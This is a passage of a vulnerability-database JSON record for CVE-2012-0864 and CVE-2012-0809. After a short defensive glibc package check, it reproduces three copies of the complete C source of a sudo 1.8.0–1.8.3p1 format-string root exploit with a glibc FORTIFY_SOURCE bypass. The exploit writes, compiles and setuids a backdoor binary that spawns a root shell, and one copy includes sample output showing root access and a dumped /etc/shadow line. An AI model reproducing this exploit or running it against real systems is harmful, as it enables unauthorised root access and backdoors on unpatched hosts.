rpm:\"glibc-devel~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-02-15T19:11:18", "description": "sudo versions 1.8.0 through 1.8.3p1 sudo_debug root exploit with glibc FORTIFY_SOURCE bypass.", "edition": 2, "published": "2013-05-01T00:00:00", "type": "zdt", "title": "Sudo v1.8.0-1.8.3p1 (sudo_debug) - Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0864", "CVE-2012-0809"], "modified": "2013-05-01T00:00:00", "id": "1337DAY-ID-20717", "href": "https://0day.today/exploit/description/20717", "sourceData": "#include <sys/resource.h>\r\n#include <sys/utsname.h>\r\n#include <gnu/libc-version.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <sys/time.h>\r\n#include <sys/stat.h>\r\n#include <string.h>\r\n#include <sys/wait.h>\r\n \r\n#define OFFSET 65000\r\n#define NUM_THREADS 0\r\n \r\n/* files that we create on disk */\r\n#define BACKDOOR \"e.c\"\r\n#define BD_COMPILED \"e\"\r\n#define SUDO_ASKPASS \"e.sh\"\r\n \r\nextern char **environ;\r\nstruct utsname ver;\r\n \r\nvoid *kill_sudo();\r\nvoid *pop_shell();\r\nvoid *set_env();\r\nint is_glibc_vuln();\r\nint is_sudo_vuln();\r\nint write_backdoor();\r\n \r\n/* hardcoded path to sudo */\r\nconst char sudo[] = \"/usr/bin/sudo\\0\";\r\nchar s_version[20];\r\n \r\n/* vuln versions of sudo */\r\nchar vuln_sudo_versions[4][20] = {\r\n {\"1.8.0\"},\r\n {\"1.8.1\"},\r\n {\"1.8.2\"},\r\n {\"1.8.3\"}\r\n};\r\n \r\n/* vuln versions of glibc */\r\nchar vuln_glibc_versions[4][20] = {\r\n {\"2.14.90\"},\r\n};\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n struct rlimit rara;\r\n int status;\r\n char ready;\r\n uname(&ver);\r\n printf(\"[+] Targeting release: %s\\n\", ver.release);\r\n if (is_glibc_vuln()){\r\n if(is_sudo_vuln()){\r\n if (write_backdoor()){\r\n printf(\"[+] Press enter when ready...\");\r\n scanf(\"%c\", &ready);\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n \r\n // ulimited stack\r\n rara.rlim_max = rara.rlim_cur = -1;\r\n setrlimit(RLIMIT_STACK, &rara);\r\n \r\n pid_t pid;\r\n if((pid = fork()) < 0)\r\n {\r\n printf(\"[-] An error occurred while forking sudo\\n\");\r\n return -1;\r\n }\r\n else if(pid == 0){\r\n set_env();\r\n kill_sudo();\r\n }else{\r\n wait(&status);\r\n if (WIFEXITED(status)) {\r\n sleep(1);\r\n pop_shell();\r\n }\r\n }\r\n}\r\n \r\nint is_glibc_vuln(){\r\n int i, returnval = -1;\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){\r\n printf(\"[+] Found vuln glibc version: %s\\n\", gnu_get_libc_version());\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n \r\nint is_sudo_vuln(){\r\n int i, returnval = -1;;\r\n FILE *fp;\r\n char path[20];\r\n char sudo_ver_cmd[50];\r\n snprintf(sudo_ver_cmd, sizeof(sudo)+3,\"%s -V\", sudo);\r\n fp = popen(sudo_ver_cmd, \"r\");\r\n \r\n if (fp == NULL) {\r\n printf(\"[-] Failed to get sudo's version\\n[-]Exiting..\" );\r\n exit(0);\r\n }\r\n fgets(path, 21, fp);\r\n memmove (s_version, path+13,5);\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(s_version, vuln_sudo_versions[i]) == 0){\r\n printf(\"[+] Found a vuln sudo version: %s\\n\", s_version);\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n \r\nint write_backdoor(){\r\n int returnval = 1;\r\n char askpass[100], compile_bd[100];\r\n char bdcode[] = \"#include <stdio.h>\\r\\n\"\r\n \"#include <stdlib.h>\\r\\n\"\r\n \"int main(int argc, char **argv){\\r\\n\"\r\n \" printf(\\\"[+] Getting root..!\\\\n\\\");\\r\\n\"\r\n \" setresuid(0,0,0);\\r\\n\"\r\n \" printf(\\\"[+] Cleaning system.\\\\n\\\");\\r\\n\"\r\n \" remove(\\\"e\\\"); remove(\\\"e.c\\\"); remove(\\\"e.sh\\\");\\r\\n\"\r\n \" printf(\\\"[+] Launching root shell!\\\\n\\\");\\r\\n\"\r\n \" system(\\\"/bin/sh\\\");\\r\\n\"\r\n \" exit(0);\\r\\n\"\r\n \"}\\r\\n\";\r\n \r\n FILE *fp = fopen(BACKDOOR,\"wb\");\r\n if (fp == NULL) {\r\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\r\n returnval = -1;\r\n }else{\r\n printf(\"[+] Writing backdoor: %s\\n\", BACKDOOR);\r\n }\r\n \r\n fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp);\r\n memset(compile_bd, 0x00, sizeof(compile_bd));\r\n snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,\"/usr/bin/gcc %s -o %s\", BACKDOOR, BD_COMPILED);\r\n printf(\"[+] Compiling backdoor: %s\\n\", BD_COMPILED);\r\n fp = popen(compile_bd, \"r\");\r\n \r\n if (fp == NULL) {\r\n printf(\"[-] Failed to compile the backdoor, check the gcc path\\n\" );\r\n returnval = -1;\r\n }\r\n \r\n fclose(fp);\r\n memset(askpass, 0x00, sizeof(askpass));\r\n snprintf(askpass, sizeof(BD_COMPILED)*2+39,\"#!/bin/sh\\nchown root:root %s\\nchmod 4777 %s\\n\", BD_COMPILED, BD_COMPILED);\r\n fp = fopen(SUDO_ASKPASS,\"w\");\r\n \r\n if (fp == NULL) {\r\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\r\n returnval = -1;\r\n }else{\r\n printf(\"[+] Writing SUDO_ASKPASS file: %s\\n\", SUDO_ASKPASS);\r\n }\r\n \r\n fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp);\r\n chmod(SUDO_ASKPASS, 0755);\r\n return returnval;\r\n};\r\n \r\nvoid *set_env(){\r\n int i = 0;\r\n char ld_preload_evar[OFFSET] = \"LD_PRELOAD=\";\r\n char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};\r\n char sudo_askpass_evar[40];\r\n for (i=0; i<(OFFSET/4); i++){\r\n memcpy(user_details+(i*4), user_details, sizeof(int));\r\n }\r\n \r\n memmove (ld_preload_evar+11, user_details , sizeof(user_details));\r\n memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar));\r\n snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,\"SUDO_ASKPASS=%s\", SUDO_ASKPASS);\r\n \r\n // set our environment\r\n putenv(ld_preload_evar);\r\n putenv(sudo_askpass_evar);\r\n};\r\n \r\nvoid *kill_sudo(){\r\n char fmtstring[] = \"%20$08n %*482$ %*2850$ %1073741824$\";\r\n char *args[] = { fmtstring, \"-D9\", \"-A\", \"\", NULL};\r\n \r\n // trigger the vuln\r\n execve(sudo, args, environ);\r\n};\r\n \r\nvoid *pop_shell(){\r\n // set our environment\r\n unsetenv(\"LD_PRELOAD\");\r\n unsetenv(\"SUDO_ASKPASS\");\r\n char *exploit_args[] = { BD_COMPILED, NULL };\r\n execve(BD_COMPILED, exploit_args, environ);\r\n};\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20717"}], "seebug": [{"lastseen": "2017-11-19T16:43:33", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURCE Bypass", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0809", "CVE-2012-0864"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-78801", "id": "SSV:78801", "sourceData": "\n /*\r\n death-star.c\r\n sudo v1.8.0-1.8.3p1 (sudo_debug) format string root exploit + glibc FORTIFY_SOURCE bypass\r\n by aeon - http://infosecabsurdity.wordpress.com/\r\n\r\n This PoC exploits:\r\n - CVE-2012-0864 - FORTIFY_SOURCE format string protection bypass via &#34;nargs&#34; integer overflow\r\n - CVE-2012-0809 - sudo v1.8.0-1.8.3p1 &#34;sudo_debug&#34; format string\r\n \r\n Tested on:\r\n - Fedora core 16 verne\r\n - glibc 2.14.90.14 release\r\n - sudo 1.8.1p2\r\n \r\n Notes:\r\n - This exploit actually turned out very reliable :-) \r\n - You can make a cleaner version of this exploit if you smash sudo_debug function pointer\r\n or a libc function pointer so you dont write to disk. I wont be releasing that version :-)\r\n\r\n References and thanks too:\r\n - http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt\r\n - http://www.vnsecurity.net/2012/02/exploiting-sudo-format-string-vunerability/\r\n - http://www.alertlogic.com/modern-userland-linux-exploitation-courseware/\r\n - &#34;A Eulogy for Format Strings&#34; http://www.phrack.org/issues.html?issue=67&id=9&mode=txt\r\n\r\n[aeon@localhost tmp]$ gcc death-star.c -o death-star\r\n[aeon@localhost tmp]$ ./death-star \r\n[+] Targeting release: 3.1.0-7.fc16.i686.PAE\r\n[+] Found vuln glibc version: 2.14.90\r\n[+] Found a vuln sudo version: 1.8.1\r\n[+] Writing backdoor: e.c\r\n[+] Compiling backdoor: e\r\n[+] Writing SUDO_ASKPASS file: e.sh\r\n[+] Press enter when ready...\r\n\r\n&#60; -------------- REMOVED --------------&#62;\r\n\r\n A?AF@F@F@F@F@&#39; from LD_PRELOAD cannot be preloaded: ignored.\r\n %1073825311%21372736 %: settings: \r\n=\r\n %1073825311%21372736 %: settings: \r\n=\r\n %1073825311%21372736 %: sudo_mode 1081383169\r\nSorry, try again.\r\nSorry, try again.\r\nSorry, try again.\r\n%20$08n %*482$ %*2850$ %1073741824$: 3 incorrect password attempts\r\n %1073886251%21372736 %: policy plugin returns 1081402445\r\n[+] Getting root..!\r\n[+] Cleaning system.\r\n[+] Launching root shell!\r\nsh-4.2# id; uname -a\r\nuid=0(root) gid=1001(aeon) groups=0(root),1001(aeon) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\nLinux localhost.localdomain 3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC 2011 i686 i686 i386 GNU/Linux\r\nsh-4.2# head -n1 /etc/shadow\r\nroot:$6$YxDB.SNvtnqhtt.T$slIOJSl7Lz07PtDF23m1G0evZH4MXvpo1VNebUUasM/je2sP6FXi2Y/QE1Ntg.93jOtTQOfZ8k2e/HhT8XzXN/:15818:0:99999:7:::\r\nsh-4.2#\r\n*/\r\n\r\n#include &#60;sys/resource.h&#62;\r\n#include &#60;sys/utsname.h&#62;\r\n#include &#60;gnu/libc-version.h&#62;\r\n#include &#60;stdlib.h&#62;\r\n#include &#60;unistd.h&#62;\r\n#include &#60;stdio.h&#62;\r\n#include &#60;sys/time.h&#62;\r\n#include &#60;sys/stat.h&#62;\r\n#include &#60;string.h&#62;\r\n#include &#60;sys/wait.h&#62;\r\n\r\n#define OFFSET 65000\r\n#define NUM_THREADS 0\r\n\r\n/* files that we create on disk */\r\n#define BACKDOOR &#34;e.c&#34;\r\n#define BD_COMPILED &#34;e&#34;\r\n#define SUDO_ASKPASS &#34;e.sh&#34;\r\n\r\nextern char **environ;\r\nstruct utsname ver;\r\n\r\nvoid *kill_sudo();\r\nvoid *pop_shell();\r\nvoid *set_env();\r\nint is_glibc_vuln();\r\nint is_sudo_vuln();\r\nint write_backdoor();\r\n\r\n/* hardcoded path to sudo */\r\nconst char sudo[] = &#34;/usr/bin/sudo\\0&#34;;\r\nchar s_version[20];\r\n\r\n/* vuln versions of sudo */\r\nchar vuln_sudo_versions[4][20] = {\r\n {&#34;1.8.0&#34;},\r\n {&#34;1.8.1&#34;},\r\n {&#34;1.8.2&#34;},\r\n {&#34;1.8.3&#34;}\r\n};\r\n\r\n/* vuln versions of glibc */\r\nchar vuln_glibc_versions[4][20] = {\r\n {&#34;2.14.90&#34;},\r\n};\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n struct rlimit rara;\r\n int status;\r\n char ready;\r\n uname(&ver);\r\n printf(&#34;[+] Targeting release: %s\\n&#34;, ver.release);\r\n if (is_glibc_vuln()){\r\n if(is_sudo_vuln()){\r\n if (write_backdoor()){\r\n printf(&#34;[+] Press enter when ready...&#34;);\r\n scanf(&#34;%c&#34;, &ready);\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n\r\n // ulimited stack\r\n rara.rlim_max = rara.rlim_cur = -1;\r\n setrlimit(RLIMIT_STACK, &rara);\r\n\r\n pid_t pid;\r\n if((pid = fork()) &#60; 0)\r\n {\r\n printf(&#34;[-] An error occurred while forking sudo\\n&#34;);\r\n return -1;\r\n }\r\n else if(pid == 0){\r\n set_env();\r\n kill_sudo();\r\n }else{\r\n wait(&status);\r\n if (WIFEXITED(status)) {\r\n sleep(1);\r\n pop_shell();\r\n }\r\n }\r\n}\r\n\r\nint is_glibc_vuln(){\r\n int i, returnval = -1;\r\n for (i = 0; i &#60; 4; i++){\r\n if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){\r\n printf(&#34;[+] Found vuln glibc version: %s\\n&#34;, gnu_get_libc_version());\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n\r\nint is_sudo_vuln(){\r\n int i, returnval = -1;;\r\n FILE *fp;\r\n char path[20];\r\n char sudo_ver_cmd[50];\r\n snprintf(sudo_ver_cmd, sizeof(sudo)+3,&#34;%s -V&#34;, sudo);\r\n fp = popen(sudo_ver_cmd, &#34;r&#34;);\r\n\r\n if (fp == NULL) {\r\n printf(&#34;[-] Failed to get sudo&#39;s version\\n[-]Exiting..&#34; );\r\n exit(0);\r\n }\r\n fgets(path, 21, fp);\r\n memmove (s_version, path+13,5);\r\n for (i = 0; i &#60; 4; i++){\r\n if (strcmp(s_version, vuln_sudo_versions[i]) == 0){\r\n printf(&#34;[+] Found a vuln sudo version: %s\\n&#34;, s_version);\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n\r\nint write_backdoor(){\r\n int returnval = 1;\r\n char askpass[100], compile_bd[100];\r\n char bdcode[] = &#34;#include &#60;stdio.h&#62;\\r\\n&#34;\r\n &#34;#include &#60;stdlib.h&#62;\\r\\n&#34;\r\n &#34;int main(int argc, char **argv){\\r\\n&#34;\r\n &#34; printf(\\&#34;[+] Getting root..!\\\\n\\&#34;);\\r\\n&#34;\r\n &#34; setresuid(0,0,0);\\r\\n&#34;\r\n &#34; printf(\\&#34;[+] Cleaning system.\\\\n\\&#34;);\\r\\n&#34;\r\n &#34; remove(\\&#34;e\\&#34;); remove(\\&#34;e.c\\&#34;); remove(\\&#34;e.sh\\&#34;);\\r\\n&#34;\r\n &#34; printf(\\&#34;[+] Launching root shell!\\\\n\\&#34;);\\r\\n&#34;\r\n &#34; system(\\&#34;/bin/sh\\&#34;);\\r\\n&#34;\r\n &#34; exit(0);\\r\\n&#34;\r\n &#34;}\\r\\n&#34;;\r\n\r\n FILE *fp = fopen(BACKDOOR,&#34;wb&#34;);\r\n if (fp == NULL) {\r\n printf(&#34;[-] Failed to write backdoor on the target, check your permissions\\n&#34; );\r\n returnval = -1;\r\n }else{\r\n printf(&#34;[+] Writing backdoor: %s\\n&#34;, BACKDOOR);\r\n }\r\n\r\n fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp);\r\n memset(compile_bd, 0x00, sizeof(compile_bd));\r\n snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,&#34;/usr/bin/gcc %s -o %s&#34;, BACKDOOR, BD_COMPILED);\r\n printf(&#34;[+] Compiling backdoor: %s\\n&#34;, BD_COMPILED);\r\n fp = popen(compile_bd, &#34;r&#34;);\r\n\r\n if (fp == NULL) {\r\n printf(&#34;[-] Failed to compile the backdoor, check the gcc path\\n&#34; );\r\n returnval = -1;\r\n }\r\n\r\n fclose(fp);\r\n memset(askpass, 0x00, sizeof(askpass));\r\n snprintf(askpass, sizeof(BD_COMPILED)*2+39,&#34;#!/bin/sh\\nchown root:root %s\\nchmod 4777 %s\\n&#34;, BD_COMPILED, BD_COMPILED);\r\n fp = fopen(SUDO_ASKPASS,&#34;w&#34;);\r\n\r\n if (fp == NULL) {\r\n printf(&#34;[-] Failed to write backdoor on the target, check your permissions\\n&#34; );\r\n returnval = -1;\r\n }else{\r\n printf(&#34;[+] Writing SUDO_ASKPASS file: %s\\n&#34;, SUDO_ASKPASS);\r\n }\r\n\r\n fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp);\r\n chmod(SUDO_ASKPASS, 0755);\r\n return returnval;\r\n};\r\n\r\nvoid *set_env(){\r\n int i = 0;\r\n char ld_preload_evar[OFFSET] = &#34;LD_PRELOAD=&#34;;\r\n char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};\r\n char sudo_askpass_evar[40];\r\n for (i=0; i&#60;(OFFSET/4); i++){\r\n memcpy(user_details+(i*4), user_details, sizeof(int));\r\n }\r\n\r\n memmove (ld_preload_evar+11, user_details , sizeof(user_details));\r\n memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar));\r\n snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,&#34;SUDO_ASKPASS=%s&#34;, SUDO_ASKPASS);\r\n\r\n // set our environment\r\n putenv(ld_preload_evar);\r\n putenv(sudo_askpass_evar);\r\n};\r\n\r\nvoid *kill_sudo(){\r\n char fmtstring[] = &#34;%20$08n %*482$ %*2850$ %1073741824$&#34;;\r\n char *args[] = { fmtstring, &#34;-D9&#34;, &#34;-A&#34;, &#34;&#34;, NULL};\r\n\r\n // trigger the vuln\r\n execve(sudo, args, environ);\r\n};\r\n\r\nvoid *pop_shell(){\r\n // set our environment\r\n unsetenv(&#34;LD_PRELOAD&#34;);\r\n unsetenv(&#34;SUDO_ASKPASS&#34;);\r\n char *exploit_args[] = { BD_COMPILED, NULL };\r\n execve(BD_COMPILED, exploit_args, environ);\r\n};\r\n\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-78801"}], "exploitpack": [{"lastseen": "2020-04-01T19:06:08", "description": "\nsudo 1.8.0 1.8.3p1 - sudo_debug glibc FORTIFY_SOURCE Bypass + Privilege Escalation", "edition": 1, "published": "2013-05-01T00:00:00", "title": "sudo 1.8.0 1.8.3p1 - sudo_debug glibc FORTIFY_SOURCE Bypass + Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0864", "CVE-2012-0809"], "modified": "2013-05-01T00:00:00", "id": "EXPLOITPACK:D0C0ABEBB66F120575911D213A03B73B", "href": "", "sourceData": "/*\n death-star.c\n sudo v1.8.0-1.8.3p1 (sudo_debug) format string root exploit + glibc FORTIFY_SOURCE bypass\n by aeon - http://infosecabsurdity.wordpress.com/\n\n This PoC exploits:\n - CVE-2012-0864 - FORTIFY_SOURCE format string protection bypass via \"nargs\" integer overflow\n - CVE-2012-0809 - sudo v1.8.0-1.8.3p1 \"sudo_debug\" format string\n \n Tested on:\n - Fedora core 16 verne\n - glibc 2.14.90.14 release\n - sudo 1.8.1p2\n \n Notes:\n - This exploit actually turned out very reliable :-) \n - You can make a cleaner version of this exploit if you smash sudo_debug function pointer\n or a libc function pointer so you dont write to disk. I wont be releasing that version :-)\n\n References and thanks too:\n - http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt\n - http://www.vnsecurity.net/2012/02/exploiting-sudo-format-string-vunerability/\n - http://www.alertlogic.com/modern-userland-linux-exploitation-courseware/\n - \"A Eulogy for Format Strings\" http://www.phrack.org/issues.html?issue=67&id=9&mode=txt\n\n[aeon@localhost tmp]$ gcc death-star.c -o death-star\n[aeon@localhost tmp]$ ./death-star \n[+] Targeting release: 3.1.0-7.fc16.i686.PAE\n[+] Found vuln glibc version: 2.14.90\n[+] Found a vuln sudo version: 1.8.1\n[+] Writing backdoor: e.c\n[+] Compiling backdoor: e\n[+] Writing SUDO_ASKPASS file: e.sh\n[+] Press enter when ready...\n\n< -------------- REMOVED -------------->\n\n A\ufffd\u001bAF\u0001@\u001fF\u0001@\u001fF\u0001@\u001fF\u0001@\u001fF\u0001@\u001f\u0002' from LD_PRELOAD cannot be preloaded: ignored.\n %1073825311%21372736 %: settings: \n=\n %1073825311%21372736 %: settings: \n=\n %1073825311%21372736 %: sudo_mode 1081383169\nSorry, try again.\nSorry, try again.\nSorry, try again.\n%20$08n %*482$ %*2850$ %1073741824$: 3 incorrect password attempts\n %1073886251%21372736 %: policy plugin returns 1081402445\n[+] Getting root..!\n[+] Cleaning system.\n[+] Launching root shell!\nsh-4.2# id; uname -a\nuid=0(root) gid=1001(aeon) groups=0(root),1001(aeon) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\nLinux localhost.localdomain 3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC 2011 i686 i686 i386 GNU/Linux\nsh-4.2# head -n1 /etc/shadow\nroot:$6$YxDB.SNvtnqhtt.T$slIOJSl7Lz07PtDF23m1G0evZH4MXvpo1VNebUUasM/je2sP6FXi2Y/QE1Ntg.93jOtTQOfZ8k2e/HhT8XzXN/:15818:0:99999:7:::\nsh-4.2#\n*/\n\n#include <sys/resource.h>\n#include <sys/utsname.h>\n#include <gnu/libc-version.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <stdio.h>\n#include <sys/time.h>\n#include <sys/stat.h>\n#include <string.h>\n#include <sys/wait.h>\n\n#define OFFSET 65000\n#define NUM_THREADS 0\n\n/* files that we create on disk */\n#define BACKDOOR \"e.c\"\n#define BD_COMPILED \"e\"\n#define SUDO_ASKPASS \"e.sh\"\n\nextern char **environ;\nstruct utsname ver;\n\nvoid *kill_sudo();\nvoid *pop_shell();\nvoid *set_env();\nint is_glibc_vuln();\nint is_sudo_vuln();\nint write_backdoor();\n\n/* hardcoded path to sudo */\nconst char sudo[] = \"/usr/bin/sudo\\0\";\nchar s_version[20];\n\n/* vuln versions of sudo */\nchar vuln_sudo_versions[4][20] = {\n {\"1.8.0\"},\n {\"1.8.1\"},\n {\"1.8.2\"},\n {\"1.8.3\"}\n};\n\n/* vuln versions of glibc */\nchar vuln_glibc_versions[4][20] = {\n {\"2.14.90\"},\n};\n\nint main(int argc, char *argv[])\n{\n struct rlimit rara;\n int status;\n char ready;\n uname(&ver);\n printf(\"[+] Targeting release: %s\\n\", ver.release);\n if (is_glibc_vuln()){\n if(is_sudo_vuln()){\n if (write_backdoor()){\n printf(\"[+] Press enter when ready...\");\n scanf(\"%c\", &ready);\n }else{ exit(0); }\n }else{ exit(0); }\n }else{ exit(0); }\n\n // ulimited stack\n rara.rlim_max = rara.rlim_cur = -1;\n setrlimit(RLIMIT_STACK, &rara);\n\n pid_t pid;\n if((pid = fork()) < 0)\n {\n printf(\"[-] An error occurred while forking sudo\\n\");\n return -1;\n }\n else if(pid == 0){\n set_env();\n kill_sudo();\n }else{\n wait(&status);\n if (WIFEXITED(status)) {\n sleep(1);\n pop_shell();\n }\n }\n}\n\nint is_glibc_vuln(){\n int i, returnval = -1;\n for (i = 0; i < 4; i++){\n if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){\n printf(\"[+] Found vuln glibc version: %s\\n\", gnu_get_libc_version());\n returnval = 1;\n }\n }\n return returnval;\n};\n\nint is_sudo_vuln(){\n int i, returnval = -1;;\n FILE *fp;\n char path[20];\n char sudo_ver_cmd[50];\n snprintf(sudo_ver_cmd, sizeof(sudo)+3,\"%s -V\", sudo);\n fp = popen(sudo_ver_cmd, \"r\");\n\n if (fp == NULL) {\n printf(\"[-] Failed to get sudo's version\\n[-]Exiting..\" );\n exit(0);\n }\n fgets(path, 21, fp);\n memmove (s_version, path+13,5);\n for (i = 0; i < 4; i++){\n if (strcmp(s_version, vuln_sudo_versions[i]) == 0){\n printf(\"[+] Found a vuln sudo version: %s\\n\", s_version);\n returnval = 1;\n }\n }\n return returnval;\n};\n\nint write_backdoor(){\n int returnval = 1;\n char askpass[100], compile_bd[100];\n char bdcode[] = \"#include <stdio.h>\\r\\n\"\n \"#include <stdlib.h>\\r\\n\"\n \"int main(int argc, char **argv){\\r\\n\"\n \" printf(\\\"[+] Getting root..!\\\\n\\\");\\r\\n\"\n \" setresuid(0,0,0);\\r\\n\"\n \" printf(\\\"[+] Cleaning system.\\\\n\\\");\\r\\n\"\n \" remove(\\\"e\\\"); remove(\\\"e.c\\\"); remove(\\\"e.sh\\\");\\r\\n\"\n \" printf(\\\"[+] Launching root shell!\\\\n\\\");\\r\\n\"\n \" system(\\\"/bin/sh\\\");\\r\\n\"\n \" exit(0);\\r\\n\"\n \"}\\r\\n\";\n\n FILE *fp = fopen(BACKDOOR,\"wb\");\n if (fp == NULL) {\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\n returnval = -1;\n }else{\n printf(\"[+] Writing backdoor: %s\\n\", BACKDOOR);\n }\n\n fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp);\n memset(compile_bd, 0x00, sizeof(compile_bd));\n snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,\"/usr/bin/gcc %s -o %s\", BACKDOOR, BD_COMPILED);\n printf(\"[+] Compiling backdoor: %s\\n\", BD_COMPILED);\n fp = popen(compile_bd, \"r\");\n\n if (fp == NULL) {\n printf(\"[-] Failed to compile the backdoor, check the gcc path\\n\" );\n returnval = -1;\n }\n\n fclose(fp);\n memset(askpass, 0x00, sizeof(askpass));\n snprintf(askpass, sizeof(BD_COMPILED)*2+39,\"#!/bin/sh\\nchown root:root %s\\nchmod 4777 %s\\n\", BD_COMPILED, BD_COMPILED);\n fp = fopen(SUDO_ASKPASS,\"w\");\n\n if (fp == NULL) {\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\n returnval = -1;\n }else{\n printf(\"[+] Writing SUDO_ASKPASS file: %s\\n\", SUDO_ASKPASS);\n }\n\n fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp);\n chmod(SUDO_ASKPASS, 0755);\n return returnval;\n};\n\nvoid *set_env(){\n int i = 0;\n char ld_preload_evar[OFFSET] = \"LD_PRELOAD=\";\n char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};\n char sudo_askpass_evar[40];\n for (i=0; i<(OFFSET/4); i++){\n memcpy(user_details+(i*4), user_details, sizeof(int));\n }\n\n memmove (ld_preload_evar+11, user_details , sizeof(user_details));\n memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar));\n snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,\"SUDO_ASKPASS=%s\", SUDO_ASKPASS);\n\n // set our environment\n putenv(ld_preload_evar);\n putenv(sudo_askpass_evar);\n};\n\nvoid *kill_sudo(){\n char fmtstring[] = \"%20$08n %*482$ %*2850$ %1073741824$\";\n char *args[] = { fmtstring, \"-D9\", \"-A\", \"\", NULL};\n\n // trigger the vuln\n execve(sudo, args, environ);\n};\n\nvoid *pop_shell(){\n // set our environment\n unsetenv(\"LD_PRELOAD\");\n unsetenv(\"SUDO_ASKPASS\");\n char *exploit_args[] = { BD_COMPILED, NULL };\n execve(BD_COMPILED, exploit_args, environ);\n};", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-0864", "CVE-2011-4609", "CVE-2011-2702"], "description": "memcpy&#40;&#41; integer overflow, RPC DoS, vfprintf&#40;&#41; integer overflow.", "edition": 1, "modified": "2012-03-10T00:00:00", "published": "2012-03-10T00:00:00", "id": "SECURITYVULNS:VULN:12241", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12241", "title": "glibc multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-0864", "CVE-2010-0015", "CVE-2011-4609", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-2702", "CVE-2011-1089"], "description": "==========================================================================\r\nUbuntu Security Notice USN-1396-1\r\nMarch 09, 2012\r\n\r\neglibc, glibc 